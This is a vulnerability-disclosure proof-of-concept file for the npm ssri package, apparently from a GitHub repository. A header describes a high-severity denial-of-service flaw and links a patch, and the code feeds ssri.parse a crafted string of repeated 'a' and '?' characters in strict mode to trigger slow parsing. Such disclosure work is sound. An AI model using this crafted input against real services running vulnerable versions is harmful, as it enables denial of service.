-
-
Notifications
You must be signed in to change notification settings - Fork 2
/
ssri.js
26 lines (21 loc) · 1.06 KB
/
ssri.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/**
* Package Manager: npm
* Link to published package: https:/npm/ssri
* Link to GitHub repo: https:/npm/ssri
* Severity level: High
* Module Description: ssri, short for Standard Subresource Integrity, is a Node.js utility for parsing, manipulating, serializing, generating, and verifying Subresource Integrity hashes.
* Additional Info: It allows cause a denial of service when parsing crafted invalid SRI strings.
* Contacted maintainer?: Yes
* patch: https:/npm/ssri/pull/17
* Open issue?: No
*/
const ssri = require('ssri')
// const integrity = 'sha512-9KhgCRIx/AmzC8xqYJTZRrnO8OW2Pxyl2DIMZSBOr0oDvtEFyht3xpp71j/r/pAe1DM+JI/A+line3jUBgzQ7A==?foo'
const integrity = 'sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?????????????????????????????????? b'
// Parsing and serializing
// const parsed = ssri.parse(integrity)
const parsed = ssri.parse(integrity,{"strict":true,"single":true})
ssri.stringify(parsed) // === integrity (works on non-Integrity objects)
var s = parsed.toString() // === integrity
console.log(s)